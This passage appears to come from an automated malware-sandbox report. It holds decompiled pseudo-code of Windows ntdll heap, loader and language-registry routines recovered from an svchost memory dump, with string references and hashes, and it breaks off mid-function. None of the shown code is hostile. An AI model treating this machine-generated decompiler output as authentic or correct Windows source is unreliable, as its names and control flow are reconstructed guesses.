                        					_v12 = _t138;
                        					if(_t138 == _t10) {
                        						_t138 = _t138 + 0x1000;
                        						_v12 = _t138;
                        					}
                        					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
                        					if(_t75 > _t138) {
                        						_v8 = _t75 - _t138;
                        						_push(0x4000);
                        						_push( &_v8);
                        						_push( &_v12);
                        						_push(0xffffffff);
                        						_t131 = E030696E0();
                        						__eflags = _t131 - 0xc0000045;
                        						if(_t131 == 0xc0000045) {
                        							_t88 = E030D3C60(_v12, _v8);
                        							__eflags = _t88;
                        							if(_t88 != 0) {
                        								_push(0x4000);
                        								_push( &_v8);
                        								_push( &_v12);
                        								_push(0xffffffff);
                        								_t131 = E030696E0();
                        							}
                        						}
                        						_t89 =  *[fs:0x30];
                        						__eflags = _t131;
                        						if(_t131 < 0) {
                        							__eflags =  *(_t89 + 0xc);
                        							if( *(_t89 + 0xc) == 0) {
                        								_push("HEAP: ");
                        								E0302B150();
                        							} else {
                        								E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        							}
                        							_push(_v8);
                        							_push(_v12);
                        							_push(_t149);
                        							_t75 = E0302B150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
                        							goto L4;
                        						} else {
                        							_t96 =  *(_t89 + 0x50);
                        							_t132 = 0x7ffe0380;
                        							__eflags = _t96;
                        							if(_t96 != 0) {
                        								__eflags =  *_t96;
                        								if( *_t96 == 0) {
                        									goto L10;
                        								}
                        								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
                        								L11:
                        								__eflags =  *_t97;
                        								if( *_t97 != 0) {
                        									_t98 =  *[fs:0x30];
                        									__eflags =  *(_t98 + 0x240) & 0x00000001;
                        									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
                        										E030E14FB(_t132, _t149, _v12, _v8, 7);
                        									}
                        								}
                        								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
                        								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
                        								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
                        								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
                        								_t101 =  *( *[fs:0x30] + 0x50);
                        								__eflags = _t101;
                        								if(_t101 != 0) {
                        									__eflags =  *_t101;
                        									if( *_t101 == 0) {
                        										goto L13;
                        									}
                        									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
                        									goto L14;
                        								} else {
                        									L13:
                        									_t102 = _t132;
                        									L14:
                        									__eflags =  *_t102;
                        									if( *_t102 != 0) {
                        										_t103 =  *[fs:0x30];
                        										__eflags =  *(_t103 + 0x240) & 0x00000001;
                        										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
                        											__eflags = E03047D50();
                        											if(__eflags != 0) {
                        												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
                        												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
                        											}
                        											E030E1411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
                        										}
                        									}
                        									_t133 = 0x7ffe038a;
                        									_t105 =  *( *[fs:0x30] + 0x50);
                        									__eflags = _t105;
                        									if(_t105 != 0) {
                        										__eflags =  *_t105;
                        										if( *_t105 == 0) {
                        											goto L16;
                        										}
                        										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
                        										goto L17;
                        									} else {
                        										L16:
                        										_t106 = _t133;
                        										L17:
                        										__eflags =  *_t106;
                        										if( *_t106 != 0) {
                        											__eflags = E03047D50();
                        											if(__eflags != 0) {
                        												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
                        												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
                        											}
                        											E030E1411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
                        										}
                        										_t75 = _t150[1] & 0x00000013 | 0x00000008;
                        										_t150[1] = _t75;
                        										goto L4;
                        									}
                        								}
                        							}
                        							L10:
                        							_t97 = _t132;
                        							goto L11;
                        						}
                        					} else {
                        						goto L4;
                        					}
                        				}
                        			}

                        Strings
                        • HEAP: , xrefs: 0309A0BA
                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0309A0CD
                        • HEAP[%wZ]: , xrefs: 0309A0AD
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                        • API String ID: 0-1340214556
                        • Opcode ID: 55b2294cc12bc38cf38cb31094f906b9eff8f4231a6286ad257cb1169451ab5d
                        • Instruction ID: 346686c0f616a5f9a37ac41f1025b1cd6c31912b8d9256abba3eaec9f6867de0
                        • Opcode Fuzzy Hash: 55b2294cc12bc38cf38cb31094f906b9eff8f4231a6286ad257cb1169451ab5d
                        • Instruction Fuzzy Hash: 50812A35302684EFDB26DB68C894BAABBF8FF44310F0845A5F9528B791D774E940DB20
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 74%
                        			E0304B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
                        				signed int _v8;
                        				char _v12;
                        				void* __ebx;
                        				void* __edi;
                        				void* __ebp;
                        				void* _t72;
                        				char _t76;
                        				signed char _t77;
                        				intOrPtr* _t80;
                        				unsigned int _t85;
                        				signed int* _t86;
                        				signed int _t88;
                        				signed char _t89;
                        				intOrPtr _t90;
                        				intOrPtr _t101;
                        				intOrPtr* _t111;
                        				void* _t117;
                        				intOrPtr* _t118;
                        				signed int _t120;
                        				signed char _t121;
                        				intOrPtr* _t123;
                        				signed int _t126;
                        				intOrPtr _t136;
                        				signed int _t139;
                        				void* _t140;
                        				signed int _t141;
                        				void* _t147;
                        
                        				_t111 = _a4;
                        				_t140 = __ecx;
                        				_v8 = __edx;
                        				_t3 = _t111 + 0x18; // 0x0
                        				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
                        				_t5 = _t111 - 8; // -32
                        				_t141 = _t5;
                        				 *(_t111 + 0x14) = _a8;
                        				_t72 = 4;
                        				 *(_t141 + 2) = 1;
                        				 *_t141 = _t72;
                        				 *((char*)(_t141 + 7)) = 3;
                        				_t134 =  *((intOrPtr*)(__edx + 0x18));
                        				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
                        					_t76 = (_t141 - __edx >> 0x10) + 1;
                        					_v12 = _t76;
                        					__eflags = _t76 - 0xfe;
                        					if(_t76 >= 0xfe) {
                        						_push(__edx);
                        						_push(0);
                        						E030EA80D(_t134, 3, _t141, __edx);
                        						_t76 = _v12;
                        					}
                        				} else {
                        					_t76 = 0;
                        				}
                        				 *((char*)(_t141 + 6)) = _t76;
                        				if( *0x3118748 >= 1) {
                        					__eflags = _a12 - _t141;
                        					if(_a12 <= _t141) {
                        						goto L4;
                        					}
                        					_t101 =  *[fs:0x30];
                        					__eflags =  *(_t101 + 0xc);
                        					if( *(_t101 + 0xc) == 0) {
                        						_push("HEAP: ");
                        						E0302B150();
                        					} else {
                        						E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
                        					E0302B150();
                        					__eflags =  *0x3117bc8;
                        					if(__eflags == 0) {
                        						E030E2073(_t111, 1, _t140, __eflags);
                        					}
                        					goto L3;
                        				} else {
                        					L3:
                        					_t147 = _a12 - _t141;
                        					L4:
                        					if(_t147 != 0) {
                        						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
                        					}
                        					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
                        						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
                        						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
                        					}
                        					_t135 =  *(_t111 + 0x14);
                        					if( *(_t111 + 0x14) == 0) {
                        						L12:
                        						_t77 =  *((intOrPtr*)(_t141 + 6));
                        						if(_t77 != 0) {
                        							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
                        						} else {
                        							_t117 = _t140;
                        						}
                        						_t118 = _t117 + 0x38;
                        						_t26 = _t111 + 8; // -16
                        						_t80 = _t26;
                        						_t136 =  *_t118;
                        						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
                        							_push(_t118);
                        							_push(0);
                        							E030EA80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
                        						} else {
                        							 *_t80 = _t136;
                        							 *((intOrPtr*)(_t80 + 4)) = _t118;
                        							 *((intOrPtr*)(_t136 + 4)) = _t80;
                        							 *_t118 = _t80;
                        						}
                        						_t120 = _v8;
                        						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
                        						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
                        						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
                        						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
                        						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
                        							__eflags =  *(_t140 + 0xb8);
                        							if( *(_t140 + 0xb8) == 0) {
                        								_t88 =  *(_t140 + 0x40) & 0x00000003;
                        								__eflags = _t88 - 2;
                        								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
                        								__eflags =  *0x3118720 & 0x00000001;
                        								_t89 = _t88 & 0xffffff00 | ( *0x3118720 & 0x00000001) == 0x00000000;
                        								__eflags = _t89 & _t121;
                        								if((_t89 & _t121) != 0) {
                        									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
                        								}
                        							}
                        						}
                        						_t85 =  *(_t111 + 0x14);
                        						if(_t85 >= 0x7f000) {
                        							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
                        						}
                        						_t86 = _a16;
                        						 *_t86 = _t141 - _a12 >> 3;
                        						return _t86;
                        					} else {
                        						_t90 = E0304B8E4(_t135);
                        						_t123 =  *((intOrPtr*)(_t90 + 4));
                        						if( *_t123 != _t90) {
                        							_push(_t123);
                        							_push( *_t123);
                        							E030EA80D(0, 0xd, _t90, 0);
                        						} else {
                        							 *_t111 = _t90;
                        							 *((intOrPtr*)(_t111 + 4)) = _t123;
                        							 *_t123 = _t111;
                        							 *((intOrPtr*)(_t90 + 4)) = _t111;
                        						}
                        						_t139 =  *(_t140 + 0xb8);
                        						if(_t139 != 0) {
                        							_t93 =  *(_t111 + 0x14) >> 0xc;
                        							__eflags = _t93;
                        							while(1) {
                        								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
                        								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
                        									break;
                        								}
                        								_t126 =  *_t139;
                        								__eflags = _t126;
                        								if(_t126 != 0) {
                        									_t139 = _t126;
                        									continue;
                        								}
                        								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
                        								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
                        								break;
                        							}
                        							E0304E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
                        						}
                        						goto L12;
                        					}
                        				}
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                        • API String ID: 0-1334570610
                        • Opcode ID: 9cd576c04825cdcc96990bc2fb3b2a3a3641d97f39e7067f44d689427510b9c9
                        • Instruction ID: 5002d90f22410deb652aa8a58b8e96dcc73edbf17919048d5dddbd691431e271
                        • Opcode Fuzzy Hash: 9cd576c04825cdcc96990bc2fb3b2a3a3641d97f39e7067f44d689427510b9c9
                        • Instruction Fuzzy Hash: 3361A2B46012059FDB58DF28C544BAABBE5FF44304F18896EE8898F341D731E991CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 98%
                        			E03037E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				char _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				char _v24;
                        				signed int _t73;
                        				void* _t77;
                        				char* _t82;
                        				char* _t87;
                        				signed char* _t97;
                        				signed char _t102;
                        				intOrPtr _t107;
                        				signed char* _t108;
                        				intOrPtr _t112;
                        				intOrPtr _t124;
                        				intOrPtr _t125;
                        				intOrPtr _t126;
                        
                        				_t107 = __edx;
                        				_v12 = __ecx;
                        				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                        				_t124 = 0;
                        				_v20 = __edx;
                        				if(E0303CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                        					_t112 = _v8;
                        				} else {
                        					_t112 = 0;
                        					_v8 = 0;
                        				}
                        				if(_t112 != 0) {
                        					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                        						_t124 = 0xc000007b;
                        						goto L8;
                        					}
                        					_t73 =  *(_t125 + 0x34) | 0x00400000;
                        					 *(_t125 + 0x34) = _t73;
                        					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                        						goto L3;
                        					}
                        					 *(_t125 + 0x34) = _t73 | 0x01000000;
                        					_t124 = E0302C9A4( *((intOrPtr*)(_t125 + 0x18)));
                        					if(_t124 < 0) {
                        						goto L8;
                        					} else {
                        						goto L3;
                        					}
                        				} else {
                        					L3:
                        					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                        						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                        						L8:
                        						return _t124;
                        					}
                        					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                        						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                        							goto L5;
                        						}
                        						_t102 =  *0x3115780; // 0x0
                        						if((_t102 & 0x00000003) != 0) {
                        							E030A5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                        							_t102 =  *0x3115780; // 0x0
                        						}
                        						if((_t102 & 0x00000010) != 0) {
                        							asm("int3");
                        						}
                        						_t124 = 0xc0000428;
                        						goto L8;
                        					}
                        					L5:
                        					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                        						goto L8;
                        					}
                        					_t77 = _a4 - 0x40000003;
                        					if(_t77 == 0 || _t77 == 0x33) {
                        						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                        						if(E03047D50() != 0) {
                        							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        						} else {
                        							_t82 = 0x7ffe0384;
                        						}
                        						_t108 = 0x7ffe0385;
                        						if( *_t82 != 0) {
                        							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                        								if(E03047D50() == 0) {
                        									_t97 = 0x7ffe0385;
                        								} else {
                        									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        								}
                        								if(( *_t97 & 0x00000020) != 0) {
                        									E030A7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                        								}
                        							}
                        						}
                        						if(_a4 != 0x40000003) {
                        							L14:
                        							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                        							if(E03047D50() != 0) {
                        								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        							} else {
                        								_t87 = 0x7ffe0384;
                        							}
                        							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                        								if(E03047D50() != 0) {
                        									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        								}
                        								if(( *_t108 & 0x00000020) != 0) {
                        									E030A7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                        								}
                        							}
                        							goto L8;
                        						} else {
                        							_v16 = _t125 + 0x24;
                        							_t124 = E0305A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                        							if(_t124 < 0) {
                        								E0302B1E1(_t124, 0x1490, 0, _v16);
                        								goto L8;
                        							}
                        							goto L14;
                        						}
                        					} else {
                        						goto L8;
                        					}
                        				}
                        			}

                        Strings
                        • LdrpCompleteMapModule, xrefs: 03089898
                        • minkernel\ntdll\ldrmap.c, xrefs: 030898A2
                        • Could not validate the crypto signature for DLL %wZ, xrefs: 03089891
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                        • API String ID: 0-1676968949
                        • Opcode ID: e899b72eece286e2ba0214380ebf6fb98113d0b3e3d83b110606d0925875f51b
                        • Instruction ID: fd448647673b5a1b22f685097808b6a8222d333a5c198637858c5753725455d7
                        • Opcode Fuzzy Hash: e899b72eece286e2ba0214380ebf6fb98113d0b3e3d83b110606d0925875f51b
                        • Instruction Fuzzy Hash: 965125B5607741DFE721EB68C944B7ABBE8BB4AB10F080AA5E8919B7D1C730ED00C750
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E0302E620(void* __ecx, short* __edx, short* _a4) {
                        				char _v16;
                        				char _v20;
                        				intOrPtr _v24;
                        				char* _v28;
                        				char _v32;
                        				char _v36;
                        				char _v44;
                        				signed int _v48;
                        				intOrPtr _v52;
                        				void* _v56;
                        				void* _v60;
                        				char _v64;
                        				void* _v68;
                        				void* _v76;
                        				void* _v84;
                        				signed int _t59;
                        				signed int _t74;
                        				signed short* _t75;
                        				signed int _t76;
                        				signed short* _t78;
                        				signed int _t83;
                        				short* _t93;
                        				signed short* _t94;
                        				short* _t96;
                        				void* _t97;
                        				signed int _t99;
                        				void* _t101;
                        				void* _t102;
                        
                        				_t80 = __ecx;
                        				_t101 = (_t99 & 0xfffffff8) - 0x34;
                        				_t96 = __edx;
                        				_v44 = __edx;
                        				_t78 = 0;
                        				_v56 = 0;
                        				if(__ecx == 0 || __edx == 0) {
                        					L28:
                        					_t97 = 0xc000000d;
                        				} else {
                        					_t93 = _a4;
                        					if(_t93 == 0) {
                        						goto L28;
                        					}
                        					_t78 = E0302F358(__ecx, 0xac);
                        					if(_t78 == 0) {
                        						_t97 = 0xc0000017;
                        						L6:
                        						if(_v56 != 0) {
                        							_push(_v56);
                        							E030695D0();
                        						}
                        						if(_t78 != 0) {
                        							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                        						}
                        						return _t97;
                        					}
                        					E0306FA60(_t78, 0, 0x158);
                        					_v48 = _v48 & 0x00000000;
                        					_t102 = _t101 + 0xc;
                        					 *_t96 = 0;
                        					 *_t93 = 0;
                        					E0306BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                        					_v36 = 0x18;
                        					_v28 =  &_v44;
                        					_v64 = 0;
                        					_push( &_v36);
                        					_push(0x20019);
                        					_v32 = 0;
                        					_push( &_v64);
                        					_v24 = 0x40;
                        					_v20 = 0;
                        					_v16 = 0;
                        					_t97 = E03069600();
                        					if(_t97 < 0) {
                        						goto L6;
                        					}
                        					E0306BB40(0,  &_v36, L"InstallLanguageFallback");
                        					_push(0);
                        					_v48 = 4;
                        					_t97 = L0302F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                        					if(_t97 >= 0) {
                        						if(_v52 != 1) {
                        							L17:
                        							_t97 = 0xc0000001;
                        							goto L6;
                        						}
                        						_t59 =  *_t78 & 0x0000ffff;
                        						_t94 = _t78;
                        						_t83 = _t59;
                        						if(_t59 == 0) {
                        							L19:
                        							if(_t83 == 0) {
                        								L23:
                        								E0306BB40(_t83, _t102 + 0x24, _t78);
                        								if(L030343C0( &_v48,  &_v64) == 0) {
                        									goto L17;
                        								}
                        								_t84 = _v48;
                        								 *_v48 = _v56;
                        								if( *_t94 != 0) {
                        									E0306BB40(_t84, _t102 + 0x24, _t94);
                        									if(L030343C0( &_v48,  &_v64) != 0) {
                        										 *_a4 = _v56;
                        									} else {
                        										_t97 = 0xc0000001;
                        										 *_v48 = 0;
                        									}
                        								}
                        								goto L6;
                        							}
                        							_t83 = _t83 & 0x0000ffff;
                        							while(_t83 == 0x20) {
                        								_t94 =  &(_t94[1]);
                        								_t74 =  *_t94 & 0x0000ffff;
                        								_t83 = _t74;
                        								if(_t74 != 0) {
                        									continue;
                        								}
                        								goto L23;
                        							}
                        							goto L23;
                        						} else {
                        							goto L14;
                        						}
                        						while(1) {
                        							L14:
                        							_t27 =  &(_t94[1]); // 0x2
                        							_t75 = _t27;
                        							if(_t83 == 0x2c) {
                        								break;
                        							}
                        							_t94 = _t75;
                        							_t76 =  *_t94 & 0x0000ffff;
                        							_t83 = _t76;
                        							if(_t76 != 0) {
                        								continue;
                        							}
                        							goto L23;
                        						}
                        						 *_t94 = 0;
                        						_t94 = _t75;
                        						_t83 =  *_t75 & 0x0000ffff;
                        						goto L19;
                        					}
                        				}
                        			}
































                        Strings
                        • @, xrefs: 0302E6C0
                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0302E68C
                        • InstallLanguageFallback, xrefs: 0302E6DB
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                        • API String ID: 0-1757540487
                        • Opcode ID: 707f933d1647ae0d6947dee6d1f8868ed867e3adf79d24c7c56c6c0590aeed67
                        • Instruction ID: 8e93733f97116a04f229f83488a99a81beb4b0b0fba39b0364565f4d4efbd1df
                        • Opcode Fuzzy Hash: 707f933d1647ae0d6947dee6d1f8868ed867e3adf79d24c7c56c6c0590aeed67
                        • Instruction Fuzzy Hash: 0C51E4B650A3159BC710EF25C840BABB3E8BF89714F09096EF989DB640F734D904C7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 60%
                        			E0304B8E4(unsigned int __edx) {
                        				void* __ecx;
                        				void* __edi;
                        				intOrPtr* _t16;
                        				intOrPtr _t18;
                        				void* _t27;
                        				void* _t28;
                        				unsigned int _t30;
                        				intOrPtr* _t31;
                        				unsigned int _t38;
                        				void* _t39;
                        				unsigned int _t40;
                        
                        				_t40 = __edx;
                        				_t39 = _t28;
                        				if( *0x3118748 >= 1) {
                        					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
                        					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
                        						_t18 =  *[fs:0x30];
                        						__eflags =  *(_t18 + 0xc);
                        						if( *(_t18 + 0xc) == 0) {
                        							_push("HEAP: ");
                        							E0302B150();
                        						} else {
                        							E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        						}
                        						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
                        						E0302B150();
                        						__eflags =  *0x3117bc8;
                        						if(__eflags == 0) {
                        							E030E2073(_t27, 1, _t39, __eflags);
                        						}
                        					}
                        				}
                        				_t38 =  *(_t39 + 0xb8);
                        				if(_t38 != 0) {
                        					_t13 = _t40 >> 0xc;
                        					__eflags = _t13;
                        					while(1) {
                        						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
                        						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
                        							break;
                        						}
                        						_t30 =  *_t38;
                        						__eflags = _t30;
                        						if(_t30 != 0) {
                        							_t38 = _t30;
                        							continue;
                        						}
                        						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
                        						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
                        						break;
                        					}
                        					return E0304AB40(_t39, _t38, 0, _t13, _t40);
                        				} else {
                        					_t31 = _t39 + 0x8c;
                        					_t16 =  *_t31;
                        					while(_t31 != _t16) {
                        						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
                        						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
                        							return _t16;
                        						}
                        						_t16 =  *_t16;
                        					}
                        					return _t31;
                        				}
                        			}















                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                        • API String ID: 0-2558761708
                        • Opcode ID: c39588f52ce00e343fa88931c2b787a531bd8ceb577782817627f7236d050777
                        • Instruction ID: 3ad0d45fe3d35e33bc5cc8fdf790f75f35b85779789fd56b48e1e690b07123c7
                        • Opcode Fuzzy Hash: c39588f52ce00e343fa88931c2b787a531bd8ceb577782817627f7236d050777
                        • Instruction Fuzzy Hash: 5711E6B13072069FEB68EB18C484B7AB7A9EF80620F18857AE086CF341D730DE81D751
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 60%
                        			E030EE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                        				signed int _v20;
                        				char _v24;
                        				signed int _v40;
                        				char _v44;
                        				intOrPtr _v48;
                        				signed int _v52;
                        				unsigned int _v56;
                        				char _v60;
                        				signed int _v64;
                        				char _v68;
                        				signed int _v72;
                        				void* __ebx;
                        				void* __edi;
                        				char _t87;
                        				signed int _t90;
                        				signed int _t94;
                        				signed int _t100;
                        				intOrPtr* _t113;
                        				signed int _t122;
                        				void* _t132;
                        				void* _t135;
                        				signed int _t139;
                        				signed int* _t141;
                        				signed int _t146;
                        				signed int _t147;
                        				void* _t153;
                        				signed int _t155;
                        				signed int _t159;
                        				char _t166;
                        				void* _t172;
                        				void* _t176;
                        				signed int _t177;
                        				intOrPtr* _t179;
                        
                        				_t179 = __ecx;
                        				_v48 = __edx;
                        				_v68 = 0;
                        				_v72 = 0;
                        				_push(__ecx[1]);
                        				_push( *__ecx);
                        				_push(0);
                        				_t153 = 0x14;
                        				_t135 = _t153;
                        				_t132 = E030EBBBB(_t135, _t153);
                        				if(_t132 == 0) {
                        					_t166 = _v68;
                        					goto L43;
                        				} else {
                        					_t155 = 0;
                        					_v52 = 0;
                        					asm("stosd");
                        					asm("stosd");
                        					asm("stosd");
                        					asm("stosd");
                        					asm("stosd");
                        					_v56 = __ecx[1];
                        					if( *__ecx >> 8 < 2) {
                        						_t155 = 1;
                        						_v52 = 1;
                        					}
                        					_t139 = _a4;
                        					_t87 = (_t155 << 0xc) + _t139;
                        					_v60 = _t87;
                        					if(_t87 < _t139) {
                        						L11:
                        						_t166 = _v68;
                        						L12:
                        						if(_t132 != 0) {
                        							E030EBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                        						}
                        						L43:
                        						if(_v72 != 0) {
                        							_push( *((intOrPtr*)(_t179 + 4)));
                        							_push( *_t179);
                        							_push(0x8000);
                        							E030EAFDE( &_v72,  &_v60);
                        						}
                        						L46:
                        						return _t166;
                        					}
                        					_t90 =  *(_t179 + 0xc) & 0x40000000;
                        					asm("sbb edi, edi");
